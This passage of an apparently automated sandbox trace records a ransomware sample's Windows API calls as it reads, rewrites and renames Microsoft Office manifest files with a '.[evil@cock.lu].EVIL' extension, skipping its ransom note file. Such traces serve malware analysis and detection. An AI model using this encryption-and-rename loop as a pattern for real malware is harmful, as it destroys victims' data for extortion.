hFile=0x1a0, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x57534, lpOverlapped=0x0) returned 1 [0102.551] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.551] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.551] _errno () returned 0x84b1160840 [0102.552] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.552] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x57540, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x57540, lpOverlapped=0x0) returned 1 [0102.553] CloseHandle (hObject=0x1a0) returned 1 [0102.553] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.553] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.553] __uncaught_exception () returned 0x84b1160800 [0102.553] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.553] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.554] ??_V@YAXPEAX@Z () returned 0x1 [0102.556] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.557] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.557] wcsstr (_Str="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.557] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 105 [0102.557] wcscmp (_String1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.557] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.557] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.558] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5b0, lpOverlapped=0x0) returned 1 [0102.563] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.563] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.563] _errno () returned 0x84b1160840 [0102.563] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.563] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5c0, lpOverlapped=0x0) returned 1 [0102.563] CloseHandle (hObject=0x1a0) returned 1 [0102.563] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.564] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.564] __uncaught_exception () returned 0x84b1160800 [0102.564] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.564] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.565] ??_V@YAXPEAX@Z () returned 0x1 [0102.568] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.568] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.568] wcsstr (_Str="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.568] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 105 [0102.568] wcscmp (_String1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.568] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 0x0 [0102.568] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 0x69 [0102.568] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.578] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xff39, lpOverlapped=0x0) returned 1 [0102.621] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.621] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.621] _errno () returned 0x84b1160840 [0102.621] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.621] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xff40, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xff40, lpOverlapped=0x0) returned 1 [0102.621] CloseHandle (hObject=0x1a0) returned 1 [0102.622] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.622] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.622] __uncaught_exception () returned 0x84b1160800 [0102.622] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.622] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.623] ??_V@YAXPEAX@Z () returned 0x1 [0102.627] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.627] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.627] wcsstr (_Str="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.627] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 105 [0102.627] wcscmp (_String1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.627] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.627] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.627] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.631] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0102.706] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.706] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.706] _errno () returned 0x84b1160840 [0102.706] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.706] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0102.706] CloseHandle (hObject=0x1a0) returned 1 [0102.706] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.707] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.707] __uncaught_exception () returned 0x84b1160800 [0102.707] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.707] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.707] ??_V@YAXPEAX@Z () returned 0x1 [0102.711] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.711] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.711] wcsstr (_Str="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.711] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 105 [0102.711] wcscmp (_String1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.711] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.711] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.712] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x63c, lpOverlapped=0x0) returned 1 [0102.749] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.749] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.749] _errno () returned 0x84b1160840 [0102.749] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.749] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x640, lpOverlapped=0x0) returned 1 [0102.749] CloseHandle (hObject=0x1a0) returned 1 [0102.749] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.750] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.750] __uncaught_exception () returned 0x84b1160800 [0102.750] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.750] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.751] ??_V@YAXPEAX@Z () returned 0x1 [0102.753] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.753] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.753] wcsstr (_Str="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.753] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 105 [0102.753] wcscmp (_String1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.753] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 0x0 [0102.753] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 0x69 [0102.753] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.755] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x24c3, lpOverlapped=0x0) returned 1 [0102.774] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.774] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.774] _errno () returned 0x84b1160840 [0102.774] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.774] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x24e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x24e0, lpOverlapped=0x0) returned 1 [0102.774] CloseHandle (hObject=0x1a0) returned 1 [0102.774] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.775] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.775] __uncaught_exception () returned 0x84b1160800 [0102.775] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.775] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.776] ??_V@YAXPEAX@Z () returned 0x1 [0102.778] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.778] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.778] wcsstr (_Str="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.778] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 105 [0102.778] wcscmp (_String1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.778] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.778] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.778] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.780] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0102.802] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.802] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.802] _errno () returned 0x84b1160840 [0102.802] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.802] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0102.802] CloseHandle (hObject=0x1a0) returned 1 [0102.802] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.803] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.803] __uncaught_exception () returned 0x84b1160800 [0102.803] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.803] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.804] ??_V@YAXPEAX@Z () returned 0x1 [0102.806] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.807] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.807] wcsstr (_Str="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.807] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 105 [0102.807] wcscmp (_String1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.807] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 0x0 [0102.807] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 0x69 [0102.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.808] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5f95e, lpOverlapped=0x0) returned 1 [0102.869] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.869] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.869] _errno () returned 0x84b1160840 [0102.870] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.870] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x5f960, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5f960, lpOverlapped=0x0) returned 1 [0102.871] CloseHandle (hObject=0x1a0) returned 1 [0102.871] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.871] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: 